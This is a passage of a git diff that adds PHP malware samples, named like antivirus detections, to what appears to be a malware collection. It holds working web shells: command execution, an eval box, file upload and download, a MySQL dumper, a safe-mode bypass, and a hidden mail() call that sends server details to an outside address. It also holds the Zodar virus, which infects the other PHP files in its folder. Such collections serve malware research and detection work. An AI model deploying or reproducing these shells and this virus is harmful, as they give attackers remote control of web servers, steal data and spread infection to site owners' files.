size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ | <a href=>http://.com</a> | <a href=http://.com>http://.com</a> | versi ".$version." ]---o</b></font></div></td></tr></table>"; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.ShellBot.e b/PHP/Backdoor.PHP.ShellBot.e new file mode 100644 index 00000000..f883c5fe --- /dev/null +++ b/PHP/Backdoor.PHP.ShellBot.e @@ -0,0 +1,76 @@ +<? +echo "ALBANIA<br>"; +$alb = @php_uname(); +$alb2 = system(uptime); +$alb3 = system(id); +$alb4 = @getcwd(); +$alb5 = getenv("SERVER_SOFTWARE"); +$alb6 = phpversion(); +$alb7 = $_SERVER['SERVER_NAME']; +$alb8 = $_SERVER['SERVER_ADDR']; +$alb9 = get_current_user(); +$os = @PHP_OS; +echo "UNITED #D-Devils By The King Sir|ToTTi<br>"; +echo "os: $os<br>"; +echo "uname -a: $alb<br>"; +echo "uptime: $alb2<br>"; +echo "id: $alb3<br>"; +echo "pwd: $alb4<br>"; +echo "SoftWare: $alb5<br>"; +echo "user: $alb9<br>"; +echo "PHPV: $alb6<br>"; +echo "ServerName: $alb7<br>"; +echo "ServerAddr: $alb8<br>"; +$free = disk_free_space($dir); +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."<br>"; +echo "TotalSpace".view_size($all)."</b>"; +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +exit; +?> diff --git a/PHP/Backdoor.PHP.ShellBot.f b/PHP/Backdoor.PHP.ShellBot.f new file mode 100644 index 00000000..cac478c2 --- /dev/null +++ b/PHP/Backdoor.PHP.ShellBot.f @@ -0,0 +1,75 @@ +?> +<? +$dir = @getcwd(); +$ker = @php_uname(); +echo "By Blu3H4".(5+2); + +$OS = @PHP_OS; + $IpServer = $_SERVER["SERVER_ADDR"]; + $UNAME = @php_uname(); + $PHPv = @phpversion(); + $SafeMode = @ini_get('safe_mode'); + + if ($SafeMode == '') { $SafeMode = "OFF"; } + else { $SafeMode = "$SafeMode"; } + +echo "<br> blu3start Server_IP: {$IpServer} __ System:{$OS} __ Uname: {$UNAME} __ PHP: {$PHPv} __ safe mode: {$SafeMode} blu3end"; + + + +echo "Blu3H47<br>"; + +$OS = @PHP_OS; +echo "<br>OSTYPE:$OS<br>"; +echo "<br>Kernel:$ker<br>"; +$free = disk_free_space($dir); +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."<br>"; +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +function view_size($size) +{ +if (!is_numeric($size)) {return FALSE;} +else +{ +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} +else {$size = $size . " B";} +return $size; +} +} + + +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Small.h b/PHP/Backdoor.PHP.Small.h new file mode 100644 index 00000000..8f3759e5 --- /dev/null +++ b/PHP/Backdoor.PHP.Small.h @@ -0,0 +1,501 @@ +<? + ########################################################## + # Small PHP Web Shell by ZaCo (c) 2004-2006 # + # +POST method # + # +MySQL Client+Dumper for DB and tables # + # +PHP eval in text format and html for phpinfo() example # + # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # + # For antichat.ru and cup.su friends usage # + # All bugs -> mailo:zaco@yandex.ru # + # Just for fun :) # + ########################################################## +error_reporting(E_ALL); +@set_time_limit(0); +function magic_q($s) +{ +if(get_magic_quotes_gpc()) +{ +$s=str_replace('\\\'','\'',$s); +$s=str_replace('\\\\','\\',$s); +$s=str_replace('\\"','"',$s); +$s=str_replace('\\\0','\0',$s); +} +return $s; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function get_perms($fn) +{ +$mode=fileperms($fn); +$perms=''; +$perms .= ($mode & 00400) ? 'r' : '-'; +$perms .= ($mode & 00200) ? 'w' : '-'; +$perms .= ($mode & 00100) ? 'x' : '-'; +$perms .= ($mode & 00040) ? 'r' : '-'; +$perms .= ($mode & 00020) ? 'w' : '-'; +$perms .= ($mode & 00010) ? 'x' : '-'; +$perms .= ($mode & 00004) ? 'r' : '-'; +$perms .= ($mode & 00002) ? 'w' : '-'; +$perms .= ($mode & 00001) ? 'x' : '-'; +return $perms; +} +$head=<<<headka +<html> +<head> +<title>Small Web Shell by ZaCo</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +</head> +<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> +<style> +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +</style> +headka; +$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); +$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; +$winda=strpos(strtolower(php_uname()),'wind'); +define('format',50); +$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); +switch($page) +{ +case 'eval': +{ +$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; +$eval_value=magic_q($eval_value); +$action=isset($_POST['action'])?$_POST['action']:'eval'; +if($action=='eval_in_html') @eval($eval_value); +else +{ +echo($head.$pages); +?> +<hr> +<form method=post> +<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> +<input name='action' value='eval' type='submit'> +<input name='action' value='eval_in_html' type='submit'> +<input name='page' value='eval' type=hidden> +</form> +<hr> +<? +} +break; +} +case 'cmd': +{ +$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; +$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); +$action=isset($_POST['action'])?$_POST['action']:'cmd'; +if(@is_dir($work_dir)) +{ +@chdir($work_dir); +$work_dir=getcwd(); +if($work_dir=='')$work_dir='/'; +else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; +} +else if(file_exists($work_dir))$work_dir=realpath($work_dir); +$work_dir=str_replace('\\','/',$work_dir); +$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); +switch($action) +{ +case 'cmd' : +{ +echo($head.$pages); +?> +<form method='post' name='main_form'> +<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> +<input name='page' value='cmd' type=hidden> +<input type=submit value='go'> +</form> +<form method=post> +<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<form method=post enctype="multipart/form-data"> +<input type="file" name="filename"> +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<form method=post> +<input name='fname' type=text size=120><br> +<input name='archive' type=radio value='none'>without arch +<input name='archive' type=radio value='gzip' checked=true>gzip archive +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<pre> +<? +if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} +else +{ +$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; +if(@is_dir($work_dir)) +{ +echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); +$handle=@opendir($work_dir); +if($handle) +{ +while(false!==($fn=readdir($handle))){$files[]=$fn;}; +@closedir($handle); +sort($files); +$not_dirs=array(); +for($i=0;$i<sizeof($files);$i++) +{ +$fn=$files[$i]; +if(is_dir($fn)) +{ +echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); +if($winda===false) +{ +$owner=@posix_getpwuid(@fileowner($work_dir.$fn)); +$group=@posix_getgrgid(@filegroup($work_dir.$fn)); +printf("% 20s|% -20s",$owner['name'],$group['name']); +} +echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); +printf("% 20s ",@filesize($work_dir.$fn).'B'); +printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); +} +else {$not_dirs[]=$fn;} +} +for($i=0;$i<sizeof($not_dirs);$i++) +{ +$fn=$not_dirs[$i]; +echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); +if($winda===false) +{ +$owner=@posix_getpwuid(@fileowner($work_dir.$fn)); +$group=@posix_getgrgid(@filegroup($work_dir.$fn)); +printf("% 20s|% -20s",$owner['name'],$group['name']); +} +echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); +printf("% 20s ",@filesize($work_dir.$fn).'B'); +printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); +} +echo('</pre><hr>'); +?> +<form name='list' method=post> +<input name='work_dir' type=hidden size=120><br> +<input name='page' value='cmd' type=hidden> +<input name='f_action' value='view' type=hidden> +</form> +<? +} else echo('Error Listing '.$e_work_dir); +} +else +switch($f_action) +{ +case 'view': +{ +echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); +$f=@fopen($work_dir,'r'); +?> +<form method=post> +<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> +<input name='page' value='cmd' type=hidden> +<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> +<input name='f_action' value='save' type=submit> +</form> +<? +break; +} +case 'save' : +{ +$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; +$f=@fopen($work_dir,'w'); +if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); +else +{ +fwrite($f,$file_text); +fclose($f); +echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); +} +break; +} +} +break; +} +break; +} +case 'upload' : +{ +if($work_dir=='')$work_dir='/'; +else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; +$f=$_FILES["filename"]["name"]; +if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); +else +{ +echo('file is uploaded in '.$e_work_dir); +} +break; +} +case 'download' : +{ +$fname=isset($_POST['fname'])?$_POST['fname']:''; +$temp_file=isset($_POST['temp_file'])?'on':'nn'; +$f=@fopen($fname,'r'); +if(!($f)) echo('file is not exists'); +else +{ +$archive=isset($_POST['archive'])?$_POST['archive']:''; +if($archive=='gzip') +{ +Header("Content-Type:application/x-gzip\n"); +$s=gzencode(fread($f,filesize($fname))); +Header('Content-Length: '.strlen($s)."\n"); +Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); +echo($s); +} +else +{ +Header("Content-Type:application/octet-stream\n"); +Header('Content-Length: '.filesize($fname)."\n"); +Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); +ob_start(); +while(feof($f)===false) +{ +echo(fread($f,10000)); +ob_flush(); +} +} +} +} +} +break; +} +case 'mysql' : +{ +$action=isset($_POST['action'])?$_POST['action']:'query'; +$user=isset($_POST['user'])?$_POST['user']:''; +$passwd=isset($_POST['passwd'])?$_POST['passwd']:''; +$db=isset($_POST['db'])?$_POST['db']:''; +$host=isset($_POST['host'])?$_POST['host']:'localhost'; +$query=isset($_POST['query'])?magic_q($_POST['query']):''; +switch($action) +{ +case 'dump' : +{ +$mysql_link=@mysql_connect($host,$user,$passwd); +if(!($mysql_link)) echo('Connect error'); +else +{ +//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols +$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; +$archive=isset($_POST['archive'])?$_POST['archive']:'none'; +if($archive!=='none')$to_file=false; +$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; +$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; +if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); +else +{ +$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; +ob_start(); +if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; +if($table_dump=='') +{ +if(!$to_file) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +$result=mysql_query('show tables',$mysql_link); +for($i=0;$i<mysql_num_rows($result);$i++) +{ +$rows=mysql_fetch_array($result); +$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); +if(!$result2)$dump_file.='#error table '.$rows[0]; +else +{ +$dump_file.='create table `'.$rows[0]."`(\n"; +for($j=0;$j<mysql_num_rows($result2)-1;$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; +} +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; +$type[$j]=$rows2[1]; +$dump_file.=");\n"; +mysql_free_result($result2); +$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); +$columns=$j-1; +for($j=0;$j<mysql_num_rows($result2);$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='insert into `'.$rows[0].'` values ('; +for($k=0;$k<$columns;$k++) +{ +$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; +} +$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; +if($archive=='none') +{ +if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} +else +{ +echo($dump_file); +ob_flush(); +} +$dump_file=''; +} +} +mysql_free_result($result2); +} +} +mysql_free_result($result); +if($archive!='none') +{ +$dump_file=gzencode($dump_file); +header('Content-Length: '.strlen($dump_file)."\n"); +echo($dump_file); +} +else if($t_f) +{ +fclose($t_f); +echo('Dump for '.$db_dump.' now in '.$to_file); +} +} +else +{ +$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); +if(!$result2)echo('error table '.$table_dump); +else +{ +if(!$to_file) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +if($to_file===false) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +$dump_file.="create table `{$table_dump}`(\n"; +for($j=0;$j<mysql_num_rows($result2)-1;$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; +} +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; +$type[$j]=$rows2[1]; +$dump_file.=");\n"; +mysql_free_result($result2); +$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); +$columns=$j-1; +for($j=0;$j<mysql_num_rows($result2);$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='insert into `'.$table_dump.'` values ('; +for($k=0;$k<$columns;$k++) +{ +$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; +} +$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; +if($archive=='none') +{ +if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} +else +{ +echo($dump_file); +ob_flush(); +} +$dump_file=''; +} +} +mysql_free_result($result2); +if($archive!='none') +{ +$dump_file=gzencode($dump_file); +header('Content-Length: '.strlen($dump_file)."\n"); +echo $dump_file; +}else if($t_f) +{ +fclose($t_f); +echo('Dump for '.$db_dump.' now in '.$to_file); +} +} +} +} +} +break; +} +case 'query' : +{ +echo($head.$pages); +?> +<hr> +<form method=post> +<table> +<td> +<table align=left> +<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> +<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> +</table> +</td> +<td> +<table> +<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> +<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> +<input name='archive' type=radio value='none'>without arch +<input name='archive' type=radio value='gzip' checked=true>gzip archive +<tr><td><input type=submit name='action' value='dump'></td></tr> +<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> +</table> +</td> +</table> +<input name='page' value='mysql' type=hidden> +<input name='action' value='query' type=submit> +</form> +<hr> +<? +$mysql_link=@mysql_connect($host,$user,$passwd); +if(!($mysql_link)) echo('Connect error'); +else +{ +if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} +//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols +$result=@mysql_query($query,$mysql_link); +if(!($result))echo(mysql_error()); +else +{ +echo("<table valign=top align=left>\n<tr>"); +for($i=0;$i<mysql_num_fields($result);$i++) +echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); +echo("\n</tr>\n"); +for($i=0;$i<mysql_num_rows($result);$i++) +{ +$rows=mysql_fetch_array($result); +echo('<tr valign=top align=left>'); +for($j=0;$j<mysql_num_fields($result);$j++) +{ +echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); +} +echo("</tr>\n"); +} +echo("</table>\n"); +} +mysql_close($mysql_link); +} +break; +} +} +break; +} +} +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Small.j b/PHP/Backdoor.PHP.Small.j new file mode 100644 index 00000000..1025ad26 --- /dev/null +++ b/PHP/Backdoor.PHP.Small.j @@ -0,0 +1,35 @@ +<html> +<head> +<div align="left"><font size="1">Input command :</font></div> +<form name="cmd" method="POST" enctype="multipart/form-data"> +<input type="text" name="cmd" size="30" class="input"><br> +<pre> +<?php +if ($_POST['cmd']){ +$cmd = $_POST['cmd']; +passthru($cmd); +} +?> +</pre> +<hr> +<div align="left"><font size="1">Uploader file :</font></div> + +<?php +$uploaded = $_FILES['file']['tmp_name']; +if (file_exists($uploaded)) { + $pwddir = $_POST['dir']; + $real = $_FILES['file']['name']; + $dez = $pwddir."/".$real; + copy($uploaded, $dez); + echo "FILE UPLOADED TO $dez"; +} +?> </pre> +<form name="form1" method="post" enctype="multipart/form-data"> + <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>"> + <input type="submit" name="submit2" value="Upload"> + <input type="file" name="file" size="15"> + </td> + </tr> +</table> +</body> +</html> diff --git a/PHP/Backdoor.PHP.Small.o b/PHP/Backdoor.PHP.Small.o new file mode 100644 index 00000000..75419efd --- /dev/null +++ b/PHP/Backdoor.PHP.Small.o @@ -0,0 +1,51 @@ +<?php +if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ +$contrs=0; +} +else{ +ini_restore("safe_mode"); +ini_restore("open_basedir"); +if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ +$contrs=0;} +else{ +$contrs=1; +}} + +if($contrs == 0){ +echo("FUCKSAFEMODEOFFBYMIC22"); +}else{ +echo("FUCKSAFEMODEONBYMIC22"); +} + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +exit; + + diff --git a/PHP/Backdoor.PHP.Small.t b/PHP/Backdoor.PHP.Small.t new file mode 100644 index 00000000..902d560b --- /dev/null +++ b/PHP/Backdoor.PHP.Small.t @@ -0,0 +1,70 @@ +<? +$dir = @getcwd(); +echo "BAGOL<br>"; +$OS = @PHP_OS; +echo "OSTYPE:$OS<br>"; +echo "uname -a; $uname<br>"; +$free = disk_free_space($dir); + +if ($free === FALSE) {$free = 0;} + +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."<br>"; + +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} + +function view_size($size) + +{ + +if (!is_numeric($size)) {return FALSE;} + +else + +{ + +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + +else {$size = $size . " B";} + +return $size; + +}} + +exit; diff --git a/PHP/Virus.PHP.Zodar b/PHP/Virus.PHP.Zodar new file mode 100644 index 00000000..4827af02 --- /dev/null +++ b/PHP/Virus.PHP.Zodar @@ -0,0 +1,39 @@ +<?php +function zodar() +{ +//[Zodar] by Negral +//Created 03/05/2002 +$c = ""; +$f = fopen (__FILE__, "r"); +$c = fread ($f, filesize (__FILE__)); +fclose ($f); +$c = substr($c,0,866); +$handle=opendir('.'); +while (($file = readdir($handle))!==false) { +if ($file != "." && $file != "..") + { +$s = substr($file, -3); +if ($s=="php") + { + $g = fopen ($file, "r"); + $cont = fread ($g,filesize ($file)); + fclose ($g); + if (!strstr($cont,"[Zodar]")) + { + unlink("$file"); + $g = fopen ($file, "a+"); + fwrite ($g,"$c"); + fwrite ($g,"\n"); + fwrite ($g,substr($cont,5)); + fclose ($g); + } + } + + } + +} + +closedir($handle); +} +zodar(); +?> \ No newline at end of file